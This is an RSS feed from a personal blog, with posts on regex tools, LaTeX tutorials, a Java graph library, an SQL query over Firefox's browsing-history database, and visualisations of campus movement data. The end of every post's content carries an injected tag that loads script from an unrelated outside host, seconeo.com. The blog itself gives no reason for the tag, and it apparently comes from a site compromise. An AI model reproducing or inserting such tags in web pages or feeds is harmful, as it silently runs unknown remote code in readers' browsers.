<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>random() &#187; Uncategorized</title>
	<atom:link href="http://blog.maxgarfinkel.com/archives/category/uncategorized/feed" rel="self" type="application/rss+xml" />
	<link>http://blog.maxgarfinkel.com</link>
	<description>All sorts, who knows?</description>
	<lastBuildDate>Thu, 19 Aug 2010 20:07:00 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>Regular Expression</title>
		<link>http://blog.maxgarfinkel.com/archives/170</link>
		<comments>http://blog.maxgarfinkel.com/archives/170#comments</comments>
		<pubDate>Wed, 24 Feb 2010 13:55:05 +0000</pubDate>
		<dc:creator>max</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://blog.maxgarfinkel.com/?p=170</guid>
		<description><![CDATA[I have a love hate relationship with regular expressions. This helps a lot though. If your Mac based then this is a nice solution too.]]></description>
			<content:encoded><![CDATA[<p>I have a love hate relationship with regular expressions. <a href="http://regex.powertoy.org/ ">This helps a lot though</a>. If your Mac based then <a href="http://code.google.com/p/reggy/">this is a nice solution too</a>.<script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.maxgarfinkel.com/archives/170/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Learning latex</title>
		<link>http://blog.maxgarfinkel.com/archives/168</link>
		<comments>http://blog.maxgarfinkel.com/archives/168#comments</comments>
		<pubDate>Sun, 21 Feb 2010 18:06:16 +0000</pubDate>
		<dc:creator>max</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://blog.maxgarfinkel.com/?p=168</guid>
		<description><![CDATA[Some tutorials on latex]]></description>
			<content:encoded><![CDATA[<p><a href="http://andy-roberts.net/misc/latex/index.html">Some tutorials on latex</a><script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.maxgarfinkel.com/archives/168/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Great Java Graph Drawing Library</title>
		<link>http://blog.maxgarfinkel.com/archives/158</link>
		<comments>http://blog.maxgarfinkel.com/archives/158#comments</comments>
		<pubDate>Fri, 29 Jan 2010 21:58:56 +0000</pubDate>
		<dc:creator>max</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://blog.maxgarfinkel.com/archives/158</guid>
		<description><![CDATA[http://jung.sourceforge.net/doc/api/index.html I wonder if these folks use it?]]></description>
			<content:encoded><![CDATA[<p><a title="Jung 2.0 Java graph library" href="http://jung.sourceforge.net/doc/api/index.html" target="_blank">http://jung.sourceforge.net/doc/api/index.html</a> I wonder if these <a title="Touchgraph graph based data viz software" href="http://www.touchgraph.com/navigator.html" target="_blank">folks</a> use it?<script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.maxgarfinkel.com/archives/158/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Firefox places.sqlite</title>
		<link>http://blog.maxgarfinkel.com/archives/151</link>
		<comments>http://blog.maxgarfinkel.com/archives/151#comments</comments>
		<pubDate>Wed, 27 Jan 2010 14:53:45 +0000</pubDate>
		<dc:creator>max</dc:creator>
				<category><![CDATA[Data visualisation]]></category>
		<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[Web programming]]></category>
		<category><![CDATA[programming]]></category>

		<guid isPermaLink="false">http://blog.maxgarfinkel.com/?p=151</guid>
		<description><![CDATA[Firefox stores your web browsing history in a sqlite db. On windows you can find it in:  Documents and Settings\\Application Data\Mozilla\Firefox\Profiles\xyz.default\. On the mac it is in your home folder: Library/Application support/Mozilla/. There is a great addon for firefox called SQLite Manager which allows you to run SQLite queries. Using this you can look at [...]]]></description>
			<content:encoded><![CDATA[<p>Firefox stores your web browsing history in a sqlite db. On windows you can find it in:  <span style="color: #999999;">Documents and Settings\\Application Data\Mozilla\Firefox\Profiles\xyz.default\</span>. On the mac it is in your home folder: <span style="color: #999999;">Library/Application support/Mozilla/</span>.</p>
<p>There is a great addon for firefox called <a title="SQLite Manager" href="http://code.google.com/p/sqlite-manager/" target="_blank">SQLite Manager</a> which allows you to run SQLite queries. Using this you can look at the places.sqlite file, which contains your web history data. I am particulalry interested in looking at the paths I take and the following query will pull out pairs of target-&gt;referer pages.</p>

<div class="wp_syntax"><div class="code"><pre class="sql" style="font-family:monospace;"><span style="color: #993333; font-weight: bold;">SELECT</span> plc2<span style="color: #66cc66;">.</span>url <span style="color: #993333; font-weight: bold;">AS</span> <span style="color: #ff0000;">'referer'</span><span style="color: #66cc66;">,</span> plc1<span style="color: #66cc66;">.</span>url <span style="color: #993333; font-weight: bold;">AS</span> <span style="color: #ff0000;">'target'</span>
<span style="color: #993333; font-weight: bold;">FROM</span> moz_historyvisits vis<span style="color: #66cc66;">,</span> moz_historyvisits vis2
<span style="color: #993333; font-weight: bold;">INNER</span> <span style="color: #993333; font-weight: bold;">JOIN</span> moz_places plc1
<span style="color: #993333; font-weight: bold;">ON</span> plc1<span style="color: #66cc66;">.</span>id <span style="color: #66cc66;">=</span> vis<span style="color: #66cc66;">.</span>place_id
<span style="color: #993333; font-weight: bold;">INNER</span> <span style="color: #993333; font-weight: bold;">JOIN</span> moz_places plc2
<span style="color: #993333; font-weight: bold;">ON</span> plc2<span style="color: #66cc66;">.</span>id <span style="color: #66cc66;">=</span> vis2<span style="color: #66cc66;">.</span>place_id
<span style="color: #993333; font-weight: bold;">WHERE</span> vis<span style="color: #66cc66;">.</span>from_visit <span style="color: #66cc66;">=</span> vis2<span style="color: #66cc66;">.</span>id</pre></div></div>

<p>There is a wealth of information in this little file, the visit_type column, for example gives you an indicator of how the URL was reached.</p>
<table>
<tbody>
<tr>
<th>Type</th>
<th>ID</th>
<th>description</th>
</tr>
<tr>
<td>TRANSITION_LINK</td>
<td>1</td>
<td>This transition type means the user followed a link and got a new toplevel window.</td>
</tr>
<tr>
<td>TRANSITION_TYPED</td>
<td>2</td>
<td>This transition type is set when the user typed the URL to get to the page.</td>
</tr>
<tr>
<td>TRANSITION_BOOKMARK</td>
<td>3</td>
<td>This transition type is set when the user followed a bookmark to get to the page.</td>
</tr>
<tr>
<td>TRANSITION_EMBED</td>
<td>4</td>
<td>This transition type is set when some inner content is loaded. This is true of all images on a page, and the contents of the iframe. It is also true of any content in a frame, regardless if whether or not the user clicked something to get there.</td>
</tr>
<tr>
<td>TRANSITION_REDIRECT_PERMANENT</td>
<td>5</td>
<td>This transition type is set when the transition was a permanent redirect.</td>
</tr>
<tr>
<td>TRANSITION_REDIRECT_TEMPORARY</td>
<td>6</td>
<td>This transition type is set when the transition was a temporary redirect.</td>
</tr>
<tr>
<td>TRANSITION_DOWNLOAD</td>
<td>7</td>
<td>This transition type is set when the transition is a download.</td>
</tr>
</tbody>
</table>
<p>For more information on this you can view the <a title="Mozilla developer pages web history info" href="https://developer.mozilla.org/en/NsINavHistoryService" target="_blank">Mozilla dev pages</a> and the full <a title="Places api for firefox" href="https://developer.mozilla.org/en/Places" target="_blank">places system</a> within firefox is documented <a title="places api for firefox" href="https://developer.mozilla.org/en/Places" target="_blank">over here. </a></p>
<p>A wealth of further information on this DB is available over at <a title="Firefox places.sqlite information" href="http://www.firefoxforensics.com/research/index.shtml" target="_blank">firefox forensics</a><script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.maxgarfinkel.com/archives/151/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>YouTube &#8211; Interactive art with wooden mirrors</title>
		<link>http://blog.maxgarfinkel.com/archives/122</link>
		<comments>http://blog.maxgarfinkel.com/archives/122#comments</comments>
		<pubDate>Thu, 01 Oct 2009 20:49:45 +0000</pubDate>
		<dc:creator>max</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://blog.maxgarfinkel.com/?p=122</guid>
		<description><![CDATA[A short video with Daniel Rozin describing his wooden mirror piece. Proper good modern art, something of this quality needs to be entered into the turner prize!]]></description>
			<content:encoded><![CDATA[<p>A short video with Daniel Rozin describing his wooden mirror piece. Proper good modern art, something of this quality needs to be entered into the turner prize!</p>
<p><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="350" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="wmode" value="transparent" /><param name="src" value="http://www.youtube.com/v/BZysu9QcceM" /><embed type="application/x-shockwave-flash" width="425" height="350" src="http://www.youtube.com/v/BZysu9QcceM" wmode="transparent"></embed></object><script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.maxgarfinkel.com/archives/122/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Collected particle media</title>
		<link>http://blog.maxgarfinkel.com/archives/102</link>
		<comments>http://blog.maxgarfinkel.com/archives/102#comments</comments>
		<pubDate>Sun, 23 Aug 2009 21:50:54 +0000</pubDate>
		<dc:creator>max</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://blog.maxgarfinkel.com/?p=102</guid>
		<description><![CDATA[Attached are some videos taken from the particle map view of the dartmouth campus suffix tree data. 
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
			id="fm_f4vplayer2_1273517925"
			class="flashmovie"
			width="500"
			height="500">
	<param name="movie" value="http://blog.maxgarfinkel.com/wp-uploads/2009/07/f4vplayer2.swf" />
	<param name="flashvars" value="source=http://blog.maxgarfinkel.com/wp-uploads/2009/08/particalMap3.flv&amp;skin=/wp-uploads/2009/07/skinoverplayseekstop.swf&amp;alpha=1&amp;bgImage=/wp-uploads/2009/07/node-graph.png" />
	<!--[if !IE]>-->
	<object	type="application/x-shockwave-flash"
			data="http://blog.maxgarfinkel.com/wp-uploads/2009/07/f4vplayer2.swf"
			name="fm_f4vplayer2_1273517925"
			width="500"
			height="500">
		<param name="flashvars" value="source=http://blog.maxgarfinkel.com/wp-uploads/2009/08/particalMap3.flv&amp;skin=/wp-uploads/2009/07/skinoverplayseekstop.swf&amp;alpha=1&amp;bgImage=/wp-uploads/2009/07/node-graph.png" />
	<!--<![endif]-->
		 
	<!--[if !IE]>-->
	</object>
	<!--<![endif]-->
</object> This animation shows the entire dataset represented as a particle map. Each location (A) is emitting a particles to each location (B) that people travelled to directly after being [...]]]></description>
			<content:encoded><![CDATA[<p>Attached are some videos taken from the particle map view of the dartmouth campus suffix tree data.</p>

<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
			id="fm_f4vplayer2_1019516417"
			class="flashmovie"
			width="500"
			height="500">
	<param name="movie" value="http://blog.maxgarfinkel.com/wp-uploads/2009/07/f4vplayer2.swf" />
	<param name="flashvars" value="source=http://blog.maxgarfinkel.com/wp-uploads/2009/08/particalMap3.flv&amp;skin=/wp-uploads/2009/07/skinoverplayseekstop.swf&amp;alpha=1&amp;bgImage=/wp-uploads/2009/07/node-graph.png" />
	<!--[if !IE]>-->
	<object	type="application/x-shockwave-flash"
			data="http://blog.maxgarfinkel.com/wp-uploads/2009/07/f4vplayer2.swf"
			name="fm_f4vplayer2_1019516417"
			width="500"
			height="500">
		<param name="flashvars" value="source=http://blog.maxgarfinkel.com/wp-uploads/2009/08/particalMap3.flv&amp;skin=/wp-uploads/2009/07/skinoverplayseekstop.swf&amp;alpha=1&amp;bgImage=/wp-uploads/2009/07/node-graph.png" />
	<!--<![endif]-->
		
<p><a href="http://adobe.com/go/getflashplayer"><img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash player" /></a></p>

	<!--[if !IE]>-->
	</object>
	<!--<![endif]-->
</object>
<p>This animation<br />
shows the entire dataset represented as a particle map. Each location (A) is emitting a particles to each location (B) that people travelled to directly after being at A. The number of particles is proportional to the number of people who made that traversal. The colouring of the particles is relative to the number of people too, thus the hotter colours show more popular trails and the cooler colours show less popular trails.</p>

<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
			id="fm_f4vplayer2_1782422077"
			class="flashmovie"
			width="500"
			height="500">
	<param name="movie" value="http://blog.maxgarfinkel.com/wp-uploads/2009/07/f4vplayer2.swf" />
	<param name="flashvars" value="source=http://blog.maxgarfinkel.com/wp-uploads/2009/08/filtered.flv&amp;skin=/wp-uploads/2009/07/skinoverplayseekstop.swf&amp;alpha=1&amp;bgImage=/wp-uploads/2009/07/node-graph.png" />
	<!--[if !IE]>-->
	<object	type="application/x-shockwave-flash"
			data="http://blog.maxgarfinkel.com/wp-uploads/2009/07/f4vplayer2.swf"
			name="fm_f4vplayer2_1782422077"
			width="500"
			height="500">
		<param name="flashvars" value="source=http://blog.maxgarfinkel.com/wp-uploads/2009/08/filtered.flv&amp;skin=/wp-uploads/2009/07/skinoverplayseekstop.swf&amp;alpha=1&amp;bgImage=/wp-uploads/2009/07/node-graph.png" />
	<!--<![endif]-->
		
<p><a href="http://adobe.com/go/getflashplayer"><img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash player" /></a></p>

	<!--[if !IE]>-->
	</object>
	<!--<![endif]-->
</object>
<p>This is a video showing the result of filtering the suffix tree first to show only a single starting location. With the canvas being less cluttered you can really start to see the relationships between landmarks.</p>
<p>As a final note there are still some problems with this firstly there are random pixels lighting up causing a flashing and introducing false points, I am not quite sure yet what is causing this. Secondly I think it would be nice to not make the number of particles on a trail to be proportional not only to the user count or probability but also to the distance between the ends of the trail. Thus the particle density becomes the representation of the popularity. I suspect this would make for a more intuitive representation as well as better revealing the direction on short and popular trails which get a bit lost.<script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.maxgarfinkel.com/archives/102/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Fantastic information design</title>
		<link>http://blog.maxgarfinkel.com/archives/99</link>
		<comments>http://blog.maxgarfinkel.com/archives/99#comments</comments>
		<pubDate>Sun, 23 Aug 2009 18:17:07 +0000</pubDate>
		<dc:creator>max</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://blog.maxgarfinkel.com/?p=99</guid>
		<description><![CDATA[It seems all these visualizations are created manually, it would be nice to aim to produce such beautiful visualizations programatically! Information Is Beautiful &#124; Ideas, issues, concepts, subjects &#8211; visualized!.]]></description>
			<content:encoded><![CDATA[<p>It seems all these visualizations are created manually, it would be nice to aim to produce such beautiful visualizations programatically!</p>
<p><a href="http://www.informationisbeautiful.net/">Information Is Beautiful | Ideas, issues, concepts, subjects &#8211; visualized!</a>.<script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.maxgarfinkel.com/archives/99/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>More cool project images</title>
		<link>http://blog.maxgarfinkel.com/archives/98</link>
		<comments>http://blog.maxgarfinkel.com/archives/98#comments</comments>
		<pubDate>Sun, 23 Aug 2009 13:03:36 +0000</pubDate>
		<dc:creator>max</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://blog.maxgarfinkel.com/archives/98</guid>
		<description><![CDATA[Here is a repeat of the particle map produced earlier today, however this one is an interesting illustration of the use of logarithms. By using the logs of the user counts on the trails we reduce the dominating effect of the top end. In the previous image the vast majority of trails were in blue [...]]]></description>
			<content:encoded><![CDATA[<p>Here is a repeat of the particle map produced earlier today, however this one is an interesting illustration of the use of logarithms. By using the logs of the user counts on the trails we reduce the dominating effect of the top end. In the previous image the vast majority of trails were in blue showing a relatively low traversal count. However by taking the log we kind of pull apart the lower end and compress down the upper end revealing some of the differences in the lower end. It is important to understand that the color ranges don&#8217;t now depict the actual differences.<br />
<div id="attachment_97" class="wp-caption alignnone" style="width: 510px"><a href="http://blog.maxgarfinkel.com/wp-uploads/2009/08/3-img.png"><img src="http://blog.maxgarfinkel.com/wp-uploads/2009/08/3-img.png" alt="particle view of suffix tree data using logs of the trail counts" title="3-img" width="500" height="500" class="size-full wp-image-97" /></a><p class="wp-caption-text">particle view of suffix tree data using logs of the trail counts</p></div><script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.maxgarfinkel.com/archives/98/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>More influence map animation</title>
		<link>http://blog.maxgarfinkel.com/archives/83</link>
		<comments>http://blog.maxgarfinkel.com/archives/83#comments</comments>
		<pubDate>Sun, 26 Jul 2009 17:17:44 +0000</pubDate>
		<dc:creator>max</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://blog.maxgarfinkel.com/?p=83</guid>
		<description><![CDATA[Here we have a animation showing the summing of intermediary influence maps, but here the natural logarithm of the count is used, rather than the straight value. 
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
			id="fm_f4vplayer2_1693179300"
			class="flashmovie"
			width="500"
			height="500">
	<param name="movie" value="/wp-uploads/2009/07/f4vplayer2.swf" />
	<param name="flashvars" value="source=/wp-uploads/2009/07/im-log.flv&amp;skin=/wp-uploads/2009/07/skinoverplayseekstop.swf&amp;alpha=0.9&amp;bgImage=/wp-uploads/2009/07/node-graph.png" />
	<!--[if !IE]>-->
	<object	type="application/x-shockwave-flash"
			data="/wp-uploads/2009/07/f4vplayer2.swf"
			name="fm_f4vplayer2_1693179300"
			width="500"
			height="500">
		<param name="flashvars" value="source=/wp-uploads/2009/07/im-log.flv&amp;skin=/wp-uploads/2009/07/skinoverplayseekstop.swf&amp;alpha=0.9&amp;bgImage=/wp-uploads/2009/07/node-graph.png" />
	<!--<![endif]-->
		 
	<!--[if !IE]>-->
	</object>
	<!--<![endif]-->
</object>]]></description>
			<content:encoded><![CDATA[<p>Here we have a animation showing the summing of intermediary influence maps, but here the natural logarithm of the count is used, rather than the straight value.</p>

<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
			id="fm_f4vplayer2_739609163"
			class="flashmovie"
			width="500"
			height="500">
	<param name="movie" value="/wp-uploads/2009/07/f4vplayer2.swf" />
	<param name="flashvars" value="source=/wp-uploads/2009/07/im-log.flv&amp;skin=/wp-uploads/2009/07/skinoverplayseekstop.swf&amp;alpha=0.9&amp;bgImage=/wp-uploads/2009/07/node-graph.png" />
	<!--[if !IE]>-->
	<object	type="application/x-shockwave-flash"
			data="/wp-uploads/2009/07/f4vplayer2.swf"
			name="fm_f4vplayer2_739609163"
			width="500"
			height="500">
		<param name="flashvars" value="source=/wp-uploads/2009/07/im-log.flv&amp;skin=/wp-uploads/2009/07/skinoverplayseekstop.swf&amp;alpha=0.9&amp;bgImage=/wp-uploads/2009/07/node-graph.png" />
	<!--<![endif]-->
		
<p><a href="http://adobe.com/go/getflashplayer"><img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash player" /></a></p>

	<!--[if !IE]>-->
	</object>
	<!--<![endif]-->
</object><script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.maxgarfinkel.com/archives/83/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Influence map</title>
		<link>http://blog.maxgarfinkel.com/archives/77</link>
		<comments>http://blog.maxgarfinkel.com/archives/77#comments</comments>
		<pubDate>Sun, 26 Jul 2009 15:52:02 +0000</pubDate>
		<dc:creator>max</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://blog.maxgarfinkel.com/?p=77</guid>
		<description><![CDATA[The following video shows an influence map being built up from intermediary maps being summed together. At each frame the new map (old map + intermediary) has its values normalized against the current maximum and minimum values apparent in the map. 
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
			id="fm_f4vplayer_560554596"
			class="flashmovie"
			width="500"
			height="500">
	<param name="movie" value="http://blog.maxgarfinkel.com/wp-uploads/2009/07/f4vplayer.swf" />
	<!--[if !IE]>-->
	<object	type="application/x-shockwave-flash"
			data="http://blog.maxgarfinkel.com/wp-uploads/2009/07/f4vplayer.swf"
			name="fm_f4vplayer_560554596"
			width="500"
			height="500">
	<!--<![endif]-->
		 
	<!--[if !IE]>-->
	</object>
	<!--<![endif]-->
</object> Update see this post for a [...]]]></description>
			<content:encoded><![CDATA[<p>The following video shows an influence map being built up from intermediary maps being summed together. At each frame the new map (old map + intermediary) has its values normalized against the current maximum and minimum values apparent in the map.</p>

<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
			id="fm_f4vplayer_997318492"
			class="flashmovie"
			width="500"
			height="500">
	<param name="movie" value="http://blog.maxgarfinkel.com/wp-uploads/2009/07/f4vplayer.swf" />
	<!--[if !IE]>-->
	<object	type="application/x-shockwave-flash"
			data="http://blog.maxgarfinkel.com/wp-uploads/2009/07/f4vplayer.swf"
			name="fm_f4vplayer_997318492"
			width="500"
			height="500">
	<!--<![endif]-->
		
<p><a href="http://adobe.com/go/getflashplayer"><img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash player" /></a></p>

	<!--[if !IE]>-->
	</object>
	<!--<![endif]-->
</object>
<p><strong>Update</strong> see <a href="http://blog.maxgarfinkel.com/archives/83" target="_self">this post</a> for a version using the log of the hot points value.<script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.maxgarfinkel.com/archives/77/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
